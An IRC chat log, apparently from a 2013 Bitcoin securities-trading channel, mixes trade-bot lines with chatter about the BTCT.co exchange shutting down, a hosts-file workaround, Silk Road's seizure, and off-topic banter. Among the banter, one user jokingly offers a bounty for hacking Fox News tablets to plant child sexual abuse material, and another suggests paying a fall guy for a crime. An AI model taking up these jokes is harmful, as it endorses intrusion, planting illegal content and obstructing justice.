= 0.6632 BTC [-] {3} Oct 07 15:38:24 [HAVELOCK] [AM1] 5 @ 1.3218222 = 6.6091 BTC [-] {3} Oct 07 15:38:25 [BTCTC] [ASICMINER-PT] 5 @ 1.3 = 6.5 BTC [-] Oct 07 15:42:29 [BTCTC] [LABCOIN] 2722 @ 0.0001502 = 0.4088 BTC [+] Oct 07 15:45:31 [HAVELOCK] [CBTC] 500 @ 0.00026845 = 0.1342 BTC [-] Oct 07 15:48:34 [BTCTC] [LABCOIN] 2000 @ 0.0001502 = 0.3004 BTC [+] Oct 07 15:59:45 [BTCTC] [LABCOIN] 10908 @ 0.00015009 = 1.6372 BTC [-] {2} Oct 07 16:22:08 [BTCTC] [LABCOIN] 19603 @ 0.0001481 = 2.9032 BTC [-] Oct 07 16:23:09 btct down? Oct 07 16:23:16 forgot to check if i have any btc there :\ Oct 07 16:23:24 damnit Oct 07 16:23:47 It's down for me Oct 07 16:23:51 Hopefully not down for good yet Oct 07 16:23:56 ^ Oct 07 16:24:03 I have fresh AM1 xfers to verify... Oct 07 16:24:11 he should lock all assets first Oct 07 16:24:23 http://www.isitdownrightnow.com/btct.co.html Oct 07 16:24:24 Btct.co - Is Btct Down Right Now? Oct 07 16:25:11 [BTCTC] [BTC-TRADING-PT] 13 @ 0.033 = 0.429 BTC [-] Oct 07 16:28:33 hmm Oct 07 16:32:03 wasn't it announced for today and everytjhing ? Oct 07 16:32:53 yes, but he had hinted that it would be late in the day, if I recall Oct 07 16:43:01 gecko_x2, site seems up but API access doesn't work Oct 07 16:43:26 litecoinglobal works though. Oct 07 16:44:39 so tat how many transfers are you working on? Oct 07 16:45:53 all in all i think it's nearly 2000 Oct 07 16:46:13 hmm Oct 07 16:46:17 works through tor for me Oct 07 16:46:24 but not directly Oct 07 16:46:55 all are xfers other than TAT.AM are caught up and awaiting assistance from the exchange operators to render the shares Oct 07 16:47:18 that sounds like quite the caseload there. Oct 07 16:47:25 Bitfunder could be a problem Oct 07 16:47:48 as manual rendering of shares would be insanely time-consuming Oct 07 16:48:05 since Ukyo has 2fa required on every xfer Oct 07 16:50:18 Gross Oct 07 16:50:33 Well I had my shit transfered to Havelock Oct 07 16:52:38 [MPEX] [S.MPOE] 5354 @ 0.00083667 = 4.4795 BTC [+] Oct 07 16:59:43 http://www.theverge.com/2013/10/7/4811382/100-dollar-us-bill-goes-into-circulation-october-8 Oct 07 16:59:43 Smarter $100 bill goes into circulation tomorrow | The Verge Oct 07 17:02:52 Burnside is selling the site software with a condition that whomever uses it must block US users. Oct 07 17:02:59 Can that even be enforced? Oct 07 17:03:14 Ciphermine wanted to buy it didn Oct 07 17:03:20 didn't they? * Oct 07 17:03:23 yeah Oct 07 17:03:41 i wouldnt use it in that case Oct 07 17:03:42 cipermine sold 5btw of shares to pay for her wedding Oct 07 17:03:50 btw = btc Oct 07 17:04:01 she was married at taco bell? Oct 07 17:04:05 lol Oct 07 17:04:10 how is she going to pay for btctc Oct 07 17:04:22 acting like she is capable of reglbseing it Oct 07 17:05:05 heh, btct.co won't load so I tried Tor, Oct 07 17:05:06 This Domain Name Has Expired Oct 07 17:05:19 maybe that's why he chose today Oct 07 17:05:43 lol works fine for me Oct 07 17:05:57 cached? Oct 07 17:06:12 i cant load it Oct 07 17:06:16 are you in the US? Oct 07 17:06:17 logged in and sold a share Oct 07 17:06:17 Mine is loading as well. Oct 07 17:06:20 Was down earlier. Oct 07 17:06:25 Not cached. Oct 07 17:06:38 lame Oct 07 17:06:53 are you in the US? Oct 07 17:06:59 I am. Oct 07 17:07:02 hrm Oct 07 17:07:03 wtf Oct 07 17:07:35 can you tell me the ip for the site? Oct 07 17:07:52 127.09.01 Oct 07 17:07:56 hehe Oct 07 17:08:01 satoshi's IP Oct 07 17:08:08 whoever made network connectors so that usb sticks fit neatly inside IS A FUCKING IDIOT Oct 07 17:08:15 either that or she works for adobe. Oct 07 17:08:26 meliisa mayer Oct 07 17:08:50 marissa* Oct 07 17:08:58 that too Oct 07 17:09:00 burn her anyway. Oct 07 17:09:07 clariisa tells all Oct 07 17:09:22 http://img.gawkerassets.com/img/18lij3zuxsp71png/original.png Oct 07 17:09:52 lsl! Oct 07 17:10:27 http://www.whatsmydns.net/#A/btct.co Oct 07 17:10:32 Global DNS Propagation Checker - What's My DNS? Oct 07 17:10:49 *something* is going on Oct 07 17:11:18 can you has state in you dns!? Oct 07 17:12:45 that's network propagation Oct 07 17:12:54 not dns of states Oct 07 17:13:16 no Oct 07 17:13:24 i mean your federal state in your dns server Oct 07 17:14:11 i assume those are cooperating providers that are just reporting what DNS they see for any given domain Oct 07 17:14:29 not sure it has anything to do with the DNS of the site Oct 07 17:14:35 nah they fiddle with them Oct 07 17:14:52 maybe not in btctc's case but otherwse Oct 07 17:15:16 btct is also using cloudflare, those two long addresses Oct 07 17:16:00 i have people transferring AM-PT shares to me which i can't verify... Oct 07 17:16:50 Well, maybe someone should've taken care of his share transfers BEFORE vacationing in Cyprus! ;P Oct 07 17:18:03 [HAVELOCK] [VTX] 1 @ 0.47989999 BTC [+] Oct 07 17:19:03 your quip is inaccurate (and impossible) Oct 07 17:19:09 these are new xfers Oct 07 17:19:25 and migrating before I left would've been impossible time-wise Oct 07 17:19:40 Kleeck__, he's online now, isn't he? Oct 07 17:19:53 i haerd burnside was playing a halloween prank and btct.cp isn't actually closing Oct 07 17:20:17 I heard the same thing like 30secs ago Oct 07 17:20:27 seems legit Oct 07 17:20:30 vacationing in Cyprus ? Oct 07 17:20:36 no Oct 07 17:20:40 businessing Oct 07 17:20:44 o, retard talk forum is down Oct 07 17:20:46 em Oct 07 17:20:47 back up Oct 07 17:20:51 I was joking, for the record. Oct 07 17:20:57 i know cause i lost the bet, dammit. Oct 07 17:21:18 "now with improved security!" Oct 07 17:21:25 oh? Oct 07 17:21:36 lieak what Oct 07 17:21:43 "We hash your passwords 100000 times" Oct 07 17:21:43 captchas Oct 07 17:21:47 everywhere Oct 07 17:21:51 I trust the businessing is with Bitcoins ? Oct 07 17:21:57 scammers extending there forum auctions :/ Oct 07 17:22:53 seems like dramatalk would hire smf dev Oct 07 17:23:34 is there a such thing as a simple machines dev Oct 07 17:23:49 simple minded dev? Oct 07 17:25:10 [HAVELOCK] [NEOBEE] 100 @ 0.00285551 = 0.2856 BTC [-] {4} Oct 07 17:27:52 Btct.co is down for me now as well, ThickAsThieves Oct 07 17:28:13 I asked Burnside to remove you Oct 07 17:31:54 Is there a bet for how long until the forum passwords are cracked? Oct 07 17:35:11 imsaguy not afaik Oct 07 17:35:20 [HAVELOCK] [AM100] 15 @ 0.01359998 = 0.204 BTC [-] Oct 07 17:36:39 Last I heard the "sample list" was a verified fake. Oct 07 17:36:57 "We hash your passwords 100000 times" << this. Oct 07 17:36:58 I'm well aware Kleeck__ Oct 07 17:37:01 no salt, more hashing Oct 07 17:37:17 Havelock rocks. They built a special tool just for me to process migrations :) Oct 07 17:37:31 Until they shut down too Oct 07 17:37:33 <.< Oct 07 17:38:22 I do like Havelock Oct 07 17:38:41 What was the word from them regarding allowing new assets to come over Oct 07 17:38:55 I believe they said, "No." Oct 07 17:39:05 I don't know the official word, but I think they denied most, if not all Oct 07 17:39:23 I do hope they at least accommodate Deprived Oct 07 17:43:48 got my remaining btc transferred off btct in the last min.. over TOR Oct 07 17:44:05 Why are you using TOR? Oct 07 17:44:19 btct was down over regular net Oct 07 17:44:23 for me Oct 07 17:44:29 [BTCTC] [ASICMINER-PT] 9 @ 1.28877777 = 11.599 BTC [-] {3} Oct 07 17:44:30 others are also having issues Oct 07 17:45:45 weird. Oct 07 17:47:31 so sad Oct 07 17:47:53 there prolly won't be another exchange unless it's distributed / p2p Oct 07 17:48:07 maybe coloured coins Oct 07 17:48:41 or Oct 07 17:48:56 maybe the world will finally rush back to MPEX :) Oct 07 17:49:35 herp. Oct 07 17:49:47 you know i can always tell the people who have an account from those who don't, Oct 07 17:49:53 cause the former know it's a small x. Oct 07 17:50:39 i do prefer all caps, but ever since seeing you correct someone i use x, in compliance Oct 07 17:50:55 although i do have an accocunt Oct 07 17:51:01 acoconut Oct 07 17:51:03 :) Oct 07 17:51:18 a cocunt? Oct 07 17:51:26 erm Oct 07 17:51:32 anywais Oct 07 17:51:52 everyone is now waiting for the mad rush into actm :p Oct 07 17:52:01 ? Oct 07 17:52:11 why would anyone rush to actm Oct 07 17:52:21 it's like boring by now, no? Oct 07 17:52:27 well Oct 07 17:52:43 lol i has a coconut and banging it together! Oct 07 17:52:49 compared to LC it's still amazing company! Oct 07 17:52:50 AMAZING COMPANY! Oct 07 17:53:05 no. 0 compared to 0 is actually still 0. Oct 07 17:53:12 a rose by any other name Oct 07 17:53:25 it's going to nine thousand! Oct 07 17:54:18 at least 9001 Oct 07 17:55:55 ISO 9001 certified? Oct 07 17:58:09 so what are we gonna do in here? Oct 07 17:58:10 :p Oct 07 17:58:17 mircea_popescu: whoever made network connectors so that usb sticks fit neatly inside IS A FUCKING IDIOT Oct 07 17:58:18 lel Oct 07 17:58:30 cue every single time i wonder why my device isn't recognized Oct 07 17:58:44 "oh, wait" Oct 07 17:58:54 ikr ? Oct 07 17:59:08 they could have designed the fuckers to work regardless of which way is up Oct 07 17:59:24 that goes against family values. Oct 07 17:59:45 i don't think a usb drive will work in your ethernet port in ANY orientation Oct 07 18:00:00 straight or otherwise Oct 07 18:00:49 point is there is no reason to restrict which way a usb connector is plugged in Oct 07 18:01:12 but that's the other way around, network port predates usb port Oct 07 18:01:17 now roughly 50% of plug attempts fail Oct 07 18:01:27 or according to murphy, atleast 51% Oct 07 18:01:46 i'm not talking about ethernet ports Oct 07 18:01:51 usb ports Oct 07 18:01:58 and how the USB standard sux Oct 07 18:02:08 yes, usb ports are also bad that way Oct 07 18:02:19 I wonder how they managed to fail that much Oct 07 18:02:29 design by committee Oct 07 18:02:31 it was destined to fail Oct 07 18:02:43 there is already a much better working solution Oct 07 18:02:49 been around since the 70's Oct 07 18:02:53 thunderbolt? ;p Oct 07 18:02:56 o Oct 07 18:03:02 3.5mm DIN plugs Oct 07 18:03:11 DIN for the WIN! Oct 07 18:03:14 or the standard headphone plug Oct 07 18:03:21 works every time Oct 07 18:03:23 "hack" to get BTCT to load: https://bitcointalk.org/index.php?topic=125629.msg3293061#msg3293061 Oct 07 18:03:27 works Oct 07 18:03:29 standard headphone plug is a very poot design Oct 07 18:03:30 1/8" Oct 07 18:03:33 they break so easily Oct 07 18:03:37 poot? Oct 07 18:03:40 nah Oct 07 18:03:48 never broken a headphone jack in my life Oct 07 18:03:48 yep Oct 07 18:03:50 the thing that usb provided aren't really hardware/connector related, but a very cheap protocol Oct 07 18:03:50 worked fine for me for decades Oct 07 18:03:55 i break them regularly Oct 07 18:04:08 maybe you should work on your motor skills :)' Oct 07 18:04:22 I broke one or two portable players headphone jacks Oct 07 18:04:26 altho to be fair i'm using heavy 1/8" to 1/4" cables for audio equipment that gets moved around a lot Oct 07 18:04:35 the 6.3mm ones are sexy Oct 07 18:04:48 but honestly SMD 1/8" jacks are usually very poorly supported on PCBs Oct 07 18:04:50 [BTCTC] [BASIC-MINING] 4 @ 0.043945 = 0.1758 BTC [+] {3} Oct 07 18:04:55 it's no sweat to rip a trace off a board Oct 07 18:05:21 ;;nethash Oct 07 18:05:21 1525038.63397 Oct 07 18:05:26 lol, btct domain expired but someone just bought some basic-mining Oct 07 18:05:26 ;;bcstats Oct 07 18:05:28 Current Blocks: 262247 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 1848 blocks | Next Difficulty In About: 1 week, 4 days, 6 hours, 26 minutes, and 20 seconds | Next Difficulty Estimate: 217927576.821 | Estimated Percent Change: 15.13427 Oct 07 18:05:51 [HAVELOCK] [B] [XBOND] 126 @ 0.00124793 = 0.1572 BTC [-] {3} Oct 07 18:05:51 [BTCTC] [BASIC-MINING] 4 @ 0.04658 = 0.1863 BTC [+] Oct 07 18:05:55 You can still get to btct if you add an entry in your hosts file. Oct 07 18:06:13 141.101.113.21 is the ip address that I'm using and it seems to work well. Oct 07 18:06:20 ok, thanks Oct 07 18:06:37 hm, error 1003, Direct IP access not allowed Oct 07 18:06:46 i will need a small rutabaga and some carrots Oct 07 18:06:51 That's why you have to put it in your hosts file. Oct 07 18:07:01 strange how that counts Oct 07 18:07:05 ok. Oct 07 18:07:32 weird. Oct 07 18:07:40 i have learned that the slim majority of btct shareholders can follow directions Oct 07 18:07:54 lol Oct 07 18:08:07 ThickAsThieves: Did Danny confirm my angel shares of NEOBEE with you? Oct 07 18:08:22 i don't think so Oct 07 18:08:32 just have him email me Oct 07 18:08:49 i know he's been busy Oct 07 18:08:56 I did, but he was in the airport when he responded to me. I'll wait until things calm down a little. Oct 07 18:09:07 he should be straight now Oct 07 18:09:25 Then, to the email I go.... :) Oct 07 18:09:41 Jere_Jones, ok, works, thanks Oct 07 18:10:08 interesting fact: four moose were introduced to the island on which i live in the early 1900s Oct 07 18:10:21 today, there are over 150,000 moose, wandering all over the highways and killing people who hit them w/ cars Oct 07 18:11:52 the pitfalls of inbreeding Oct 07 18:12:26 yeah Oct 07 18:12:28 tasty though Oct 07 18:12:34 lel, from wikipedia: "Moose scat is commonly found on trails. Some souvenir shops sell bags of it, sealed with shellac and labeled with humorous names." Oct 07 18:13:02 author obv too stupid to realize that every souvenir shop in north america sells bags of chocolate-covered almonds as "____ poop" Oct 07 18:13:30 and they're shiny because of confectioner's glaze, not shellac Oct 07 18:13:31 lel Oct 07 18:13:54 from what i read, it sounds like they are using real poop Oct 07 18:16:10 you're telling me that stores are representing animal feces as food? Oct 07 18:18:47 where does that text say to eat it? Oct 07 18:18:54 no one eats shellac Oct 07 18:18:59 ಠ_ಠ Oct 07 18:19:02 unless by mistake on table fruit Oct 07 18:19:14 maybe we're talking about different things Oct 07 18:19:23 "Moose scat is commonly found on trails. Some souvenir shops sell bags of it, sealed with shellac and labeled with humorous names." Oct 07 18:19:27 but i've seen bags of "moose droppings", "elk droppings", etc Oct 07 18:19:34 and they're invariably chocolate-covered almonds Oct 07 18:19:47 peanuts are a variable! Oct 07 18:19:59 i know this because i love chocolate covered almonds, and dislike feces, and have eaten many bags of "moose droppings" Oct 07 18:20:06 and none of them have been shellacked poo Oct 07 18:20:37 http://alaskanspecialties.com/article/moose-poop-souvenirs Oct 07 18:20:37 Moose Poop Souvenirs | Alaskan Specialties Oct 07 18:20:38 booya Oct 07 18:20:50 http://www.eatonfarmcandies.com/files/image/new%20productimages/moose%20droppings.jpg Oct 07 18:20:52 booya Oct 07 18:20:58 you didnt quote candy Oct 07 18:21:23 http://la2toronto.com/wordpress/wp-content/uploads/2012/07/377-canadian-moose-droppings.jpg Oct 07 18:21:24 &c Oct 07 18:21:25 Error: "c" is not a valid command. Oct 07 18:21:37 hmm Oct 07 18:21:57 if you can find me a bag of shellacked shit with a humorous name, i'll accept defeat Oct 07 18:22:12 but i still hold that the author of that caption is just confused Oct 07 18:22:32 https://www.google.ca/search?q=moose+droppings&es_sm=119&source=lnms&tbm=isch&sa=X&ei=M9FSUpeoNYj-4AOh2IGACw&ved=0CAkQ_AUoAQ&biw=1111&bih=780&dpr=1#es_sm=119&q=moose+droppings+chocolate&tbm=isch&imgdii=_ Oct 07 18:22:55 why call the author confused when he details a thing that exists? Oct 07 18:23:29 very confusing ;) Oct 07 18:23:51 http://www.cbc.ca/news/canada/manitoba/students-tricked-into-eating-moose-poop-by-school-staff-1.1259954 Oct 07 18:23:53 Students tricked into eating moose poop by school staff - Manitoba - CBC News Oct 07 18:24:04 LEL Oct 07 18:24:57 good moooorning Oct 07 18:24:58 "Droppings stuck in girl's braces" Oct 07 18:24:59 "Two Grade 8 teens from the school in Grand Marais, Man., were given the poop but told they were chocolate-covered almonds." Oct 07 18:25:02 urbit is the greatest time sink ever Oct 07 18:25:03 "Not a joke, anti-bullying expert says" Oct 07 18:25:04 lol Oct 07 18:25:09 "An international anti-bullying expert is shocked by the incident." Oct 07 18:25:19 if it's not a joke, why can't i stop laughing? Oct 07 18:25:31 aaaaaah hahahahaha Oct 07 18:25:47 to be an anti-bullying exper, must youi get beat up a lot? Oct 07 18:25:56 see, "moose dropping" chocolate is so common that these kids legitimately had no idea that it might actually be poop Oct 07 18:25:59 lel x 1000 Oct 07 18:26:14 tat, i think it's a prerequisite Oct 07 18:26:16 what's this lel stuff? Oct 07 18:26:21 some 4channery i missed? Oct 07 18:26:24 nah Oct 07 18:26:34 i don't like using "lol" Oct 07 18:26:44 i used to be that way Oct 07 18:26:46 but "hahahahaha" doesn't always work Oct 07 18:26:47 i gave up Oct 07 18:26:59 so i figured saying "lel" would get the message across Oct 07 18:27:07 in a hipster way Oct 07 18:27:10 and burn out some people in the process Oct 07 18:27:20 hipster is an artificial construct Oct 07 18:27:23 you kids and your ideas Oct 07 18:27:23 löl Oct 07 18:27:29 remember when we called them "metrosexuals"? Oct 07 18:27:31 nubbins`: https://www.youtube.com/watch?v=4X2AvfSTi6Q Oct 07 18:27:45 metrosexuals were something else Oct 07 18:27:57 another word to hate on people with personal style Oct 07 18:28:00 same thing Oct 07 18:28:08 americans trying to look european Oct 07 18:28:16 :) Oct 07 18:28:30 thin? Oct 07 18:28:37 now americans trying to look european are known as rappers Oct 07 18:29:13 everyone in Amsterdam was much better looking that in the US Oct 07 18:29:16 dressed well Oct 07 18:29:19 etc Oct 07 18:29:31 must be all the cycling Oct 07 18:29:38 all the not eating garbage Oct 07 18:30:04 mircea_popescu, i took a picture of all the bicycles for you but forgot to post it Oct 07 18:30:12 all the everything Oct 07 18:30:20 aww! Oct 07 18:30:23 all the culture? Oct 07 18:30:29 all the history Oct 07 18:30:36 then next day NY (i think) announced a plan to use ducts underground for trash Oct 07 18:30:44 hahaha Oct 07 18:30:59 it's happening! Oct 07 18:31:01 so basically just dump it in the sewers? Oct 07 18:31:05 no Oct 07 18:31:07 "the water filters all this stuff out" Oct 07 18:31:16 mp says all transport and trash should route underground Oct 07 18:31:32 good luck with that Oct 07 18:31:37 which isnt a bad idea Oct 07 18:31:42 we can't even figure out underground electrical wires Oct 07 18:31:51 wireless trash! Oct 07 18:32:37 you tend to stop seeing them after a while, but just take note of the massive amounts of wires strung all around the place the next time you're outside Oct 07 18:32:39 it's retarded Oct 07 18:32:57 nubbins` the dope dealers gotta strung the shoes somewhere... Oct 07 18:33:10 they do headphones instead of shoes here Oct 07 18:33:15 the caption was sposed to be: mircea_popescu, what should i do? http://imgur.com/F6V77ER Oct 07 18:33:17 [BTCTC] [LABCOIN] 16806 @ 0.00013533 = 2.2744 BTC [-] {10} Oct 07 18:33:50 shoulda brought a grenade Oct 07 18:34:18 [BTCTC] [LABCOIN] 1173 @ 0.00013 = 0.1525 BTC [-] Oct 07 18:34:21 so what is this log, has nubbins` been scamming everyone with shis moose shit ipo ? Oct 07 18:34:37 weird, my camera makes square photos Oct 07 18:34:37 dividends, &c Oct 07 18:34:39 benkay_ wait till the strip poker hits! Oct 07 18:35:15 ThickAsThieves burn them anyway. Oct 07 18:35:19 [BTCTC] [LABCOIN] 45000 @ 0.00012429 = 5.5931 BTC [-] {7} Oct 07 18:35:46 speaking of shellac, we had some tenants move out a couple months ago Oct 07 18:35:57 such a stink of cat shit/piss that we had to use shellac-base paint on the walls Oct 07 18:36:12 how do you know it was cat shit. Oct 07 18:36:23 they left 3 full litter boxes Oct 07 18:36:42 and he is an expert on droppings Oct 07 18:36:44 people with cat syndrome. Oct 07 18:36:44 obv Oct 07 18:36:56 well, i like chocolate covered almonds and cats Oct 07 18:36:58 :P Oct 07 18:37:27 im actually gonna upload the pictures i took after they "moved out" Oct 07 18:37:35 gimme a couple minutes Oct 07 18:39:17 so i just found out some btct users used an address from online wallet that has no signature functions Oct 07 18:39:42 bummer Oct 07 18:39:48 there will be fun yet Oct 07 18:39:53 first blood, then fun Oct 07 18:40:59 so they get to pester the online wallet to implement signatures in order to get their w/e ? Oct 07 18:41:16 jurov you have like a small qty of holders no? Oct 07 18:41:26 you really need wallet sigs? Oct 07 18:41:34 arent you the only one that knows share counts? Oct 07 18:41:42 tell them to give that Oct 07 18:41:51 along with btct email and account name Oct 07 18:41:54 or such Oct 07 18:42:03 yes not many but why not do things properly? https://coinbr.com/btct/idiff_1 Oct 07 18:42:33 you just said why ;) Oct 07 18:43:19 fortunately i can just pay out untransferred future contracts and be done with them Oct 07 18:43:40 mircea_popescu: after I write this Nock interpreter and then learn Hoon... Oct 07 18:43:58 http://www.theguardian.com/technology/2013/oct/07/fbi-bitcoin-silk-road-ross-ulbricht still a failure, why would they know he has those Oct 07 18:43:59 FBI struggles to seize 600,000 Bitcoins from alleged Silk Road founder | Technology | theguardian.c Oct 07 18:44:08 they dont know Oct 07 18:44:28 isnt that amount extrapolated from their guess of commissions on their guess of all sales to date? Oct 07 18:44:41 what, it's 600k now? Oct 07 18:44:50 ThickAsThieves yup. Oct 07 18:44:50 oh, maybe Oct 07 18:45:03 jurov the point about how im lolling at them for not making any forfeitures this turn around burned. Oct 07 18:45:07 so they're trying :D Oct 07 18:45:45 the article also notes how since the fbi has his wallet, the coins cant be spent Oct 07 18:45:48 lol Oct 07 18:45:52 herp Oct 07 18:45:53 lmao. Oct 07 18:45:56 yea superherp Oct 07 18:46:04 the state is in for a rude awakening. Oct 07 18:46:13 it will happen ion about one more week Oct 07 18:46:15 i'm waiting out for revelation how much of these bitcoins they gave him Oct 07 18:46:17 m,aybne two Oct 07 18:46:27 at which point, watch the bitcoin foundation go in overdrive. Oct 07 18:46:31 mircea_popescu: you refer to the debt ceiling? Oct 07 18:46:33 i'm still hoping that Ross isnt even the guy' Oct 07 18:46:38 would be so fun Oct 07 18:46:49 If the FBI confiscated all copies of the private key, then maybe. Oct 07 18:46:57 ThickAsThieves here's a simple plan : pay someone a little coin to be the fall guy. Oct 07 18:47:05 they can't prosecute you for something they already convicted someone else for. Oct 07 18:47:15 i just find it hard to believe that DPR would be this sloppy Oct 07 18:47:23 he KNEW he would get arrested one day Oct 07 18:47:30 so he MUST have a plan Oct 07 18:47:31 [MPEX] [S.MPOE] 15037 @ 0.00084201 = 12.6613 BTC [+] {5} Oct 07 18:47:39 he didn't plan on tor being a surveillance tool. Oct 07 18:47:41 public defender count? Oct 07 18:47:44 the rest is "parallel construction" Oct 07 18:48:00 mircea_popescu: that wasn't how he was arrested at all so… Oct 07 18:48:09 ThickAsThieves: what should he do? lend them to theymos for greater drama? Oct 07 18:48:17 how did fbi get the server copy anyway? Oct 07 18:48:20 and why would criminals crime if they thought they couldn't get away with it? Oct 07 18:48:34 he used a vpn to connect to the server Oct 07 18:48:41 and they asked the vpn Oct 07 18:49:50 and why was he living in a $1000 apartment? Oct 07 18:50:07 Even if the FBI only found out where the coins were stored. Eventually those coins would have to be used somewhere that could be "backtraced". Those mixers are not infallible Oct 07 18:50:54 not everyone needs to live in a mansion with two pools Oct 07 18:51:06 an apartment tho? Oct 07 18:51:09 lewicki yes, yes they are. Oct 07 18:51:15 like why live witha roommate Oct 07 18:51:23 yes, that is weird indeed Oct 07 18:51:24 at what point do you say, 20...30..80 million is enough Oct 07 18:51:26 because no friends ? Oct 07 18:51:38 so hang out at starbucks Oct 07 18:51:42 i dunno Oct 07 18:51:48 when I'm a trillionnaire I'll still live in a small appartment, but with people? no way! Oct 07 18:51:49 doesnt make sense Oct 07 18:52:11 if you have that much money Oct 07 18:52:17 you leave the US too Oct 07 18:52:26 he didnt have that much money. Oct 07 18:52:34 he struggled for three weeks to move a kg of coke. Oct 07 18:52:36 [HAVELOCK] [AM1] 6 @ 1.3072 = 7.8432 BTC [-] {3} Oct 07 18:52:37 he could simply like where he lives Oct 07 18:52:40 this is the definition of small timer. Oct 07 18:52:57 indeed that thing is weird Oct 07 18:53:14 why would the megaboss of the internet mafia do that? Oct 07 18:53:19 the average car salesman sells more worth of car a day. Oct 07 18:53:41 likely for a better cut, too. Oct 07 18:53:52 there will def be more to thi story Oct 07 18:54:10 a drug dealer is usually more honest than a car salesman though Oct 07 18:54:12 my bet is that as the feds get enough of being humiliated it quietly drops into oblivion. Oct 07 18:54:40 it's not unbelievable that the nerd running the SR show would know nothing about actually moving product Oct 07 18:56:20 wasnt really his job anyway Oct 07 18:57:25 why did he get involved is what i want to know. Oct 07 18:57:54 it's so stupid this shit. im torn as towhether to do a write-up of why it's stupid and in the process prove i understand the drug trade all too well or just stfu. Oct 07 18:58:14 oh please do Oct 07 18:58:15 probably just a whim, coder says oh i can make a thing! Oct 07 18:58:20 then makes it live Oct 07 18:58:25 and just kinda rolls with it Oct 07 18:58:32 then btctalk can add drug dealer to the list of epithets they spit Oct 07 18:58:37 heh. Oct 07 18:59:09 isnt the story that there is an original and a 2nd owner? Oct 07 18:59:17 the issue is that he wasn't nerd enough. he made technical mistakes, and then wasn't paranoid enough, thought he has the street smarts or whatever Oct 07 18:59:36 i find that not believable Oct 07 18:59:58 technical mistakes sure, but not paranoid enough?! Oct 07 19:00:23 he aided in a drug supermarket Oct 07 19:00:26 he posted under his real name... Oct 07 19:00:28 how could he not be paranoid Oct 07 19:00:33 of course he wasn't paranoid enough Oct 07 19:00:52 allegedly Oct 07 19:01:06 maybe Ross is the original guy Oct 07 19:01:14 and realized quickly he was too deep Oct 07 19:01:27 and that he wasnt paranoid enough at the start Oct 07 19:01:33 so he sold it Oct 07 19:01:39 and now that guy is out there Oct 07 19:02:06 probly running BMR etc Oct 07 19:07:51 [HAVELOCK] [AM1] 2 @ 1.40999999 = 2.82 BTC [+] Oct 07 19:08:04 http://www.bbc.co.uk/news/business-24426881 Oct 07 19:08:05 BBC News - China tells US to avoid debt crisis for sake of global economy Oct 07 19:08:36 "We hope the United States fully understands the lessons of history," Mr Zhu said Oct 07 19:08:52 [HAVELOCK] [AM1] 1 @ 1.41 BTC [+] Oct 07 19:09:05 hah Oct 07 19:09:15 China should know the US better by no Oct 07 19:09:16 now* Oct 07 19:09:31 China will grow larger. Oct 07 19:10:57 us fracks like crazy: http://blogs.marketwatch.com/energy-ticker/2013/10/04/move-over-russia-u-s-is-now-the-worlds-biggest-oil-gas-producer/ Oct 07 19:12:40 Rulother and what can China do? covertyl assassinate few tea partiers? Oct 07 19:12:43 > http://youtu.be/UPH9iKpM-fk?t=6s Oct 07 19:13:19 If we were only so lucky Oct 07 19:28:11 [HAVELOCK] [AM1] 24 @ 1.41583331 = 33.98 BTC [+] {6} Oct 07 19:31:14 [HAVELOCK] [HIM] 1 @ 0.12989999 BTC [-] Oct 07 19:34:18 [HAVELOCK] [HIM] 1 @ 0.1299 BTC [+] Oct 07 19:37:19 [HAVELOCK] [AM100] 25 @ 0.013632 = 0.3408 BTC [+] {2} Oct 07 19:43:26 [MPEX] [S.MPOE] 7300 @ 0.00084306 = 6.1543 BTC [+] Oct 07 19:49:32 [HAVELOCK] [AM100] 8 @ 0.0137 = 0.1096 BTC [+] Oct 07 19:52:35 [HAVELOCK] [AM100] 8 @ 0.0137 = 0.1096 BTC [+] {2} Oct 07 20:00:21 benkay_ http://trilema.com/2013/what-the-drug-trade-is-how-the-drug-trade-works-and-why-silk-road-didnt-work-and-didnt-matter/ Oct 07 20:00:22 enjoy. Oct 07 20:00:31 oooh Oct 07 20:01:07 hmm google docs is not letting me paste into google a spreadsheet without installing google drive for chrome (i'm using opera) Oct 07 20:01:17 suddenly Oct 07 20:01:35 pallet ;) Oct 07 20:03:27 pellet lol Oct 07 20:03:31 pew pew Oct 07 20:05:42 waaat Oct 07 20:16:32 lol http://www.theverge.com/2013/10/7/4812630/fox-news-shepard-smith-news-deck Oct 07 20:17:24 wtf Oct 07 20:17:33 Honey I Shrunk Fox News Oct 07 20:17:56 lol Oct 07 20:18:00 [BTCTC] [FN] [DMS.SELLING] 60 @ 0.00375 = 0.225 BTC [-] Oct 07 20:18:06 lol Oct 07 20:18:19 reminds me of http://www.businessinsider.com/the-us-army-star-trek-command-center-2013-9 Oct 07 20:19:08 Bigger screems means we're more relevant, right? RIGHT GUIZ?! Oct 07 20:20:00 now every foxnews viewer will be compelled to get a tablet Oct 07 20:20:07 1 btc to the first person that hacks into their tablets and puts cp on. Oct 07 20:20:56 resulting in all of fox news being put on the sex offender register Oct 07 20:21:08 they'd blame obama Oct 07 20:21:12 bigger bounty deserved! Oct 07 20:21:14 get off scot free Oct 07 20:21:50 I'll add 2btc, but not cp, I want mp on a horse Oct 07 20:22:59 i think that horse was underage anyway. Oct 07 20:28:08 you can settle for mp on a camel now Oct 07 20:30:50 i dunno if i made camel pix Oct 07 20:35:39 is there any back and lay betting exchange for btc? Oct 07 20:35:42 like betfair Oct 07 20:38:50 about a dozen people tried and failed. if you care to understand the reasons i can link you to a write-up. Oct 07 20:39:21 [HAVELOCK] [AM100] 100 @ 0.01300059 = 1.3001 BTC [-] {5} Oct 07 20:39:22 yeah, would be nice Oct 07 20:39:45 is it the low volume problem on startup? Oct 07 20:40:22 [HAVELOCK] [AM100] 45 @ 0.013 = 0.585 BTC [-] {2} Oct 07 20:40:43 nah Oct 07 20:40:59 lemme see ehre Oct 07 20:41:23 [HAVELOCK] [AM100] 300 @ 0.01264222 = 3.7927 BTC [-] {10} Oct 07 20:42:14 http://trilema.com/2013/least-likely-to-succeed-character-the-upseller/ Oct 07 20:42:16 Least likely to succeed character : The upseller pe Trilema - Un blog de Mircea Popescu. Oct 07 20:42:18 2nd half is the meat of it. Oct 07 20:46:03 you mean the liquidity problem? Oct 07 20:46:28 nope. Oct 07 20:49:31 [BTCTC] [MININGCO.ETF] 16 @ 0.0219375 = 0.351 BTC [+] {2} Oct 07 20:52:50 I stopped by and talked to Cointerra in person Oct 07 20:53:01 o hey. what's he say ? Oct 07 20:53:51 There was 3 of them, I got to see renderings that are not published yet- talked for about 1.5 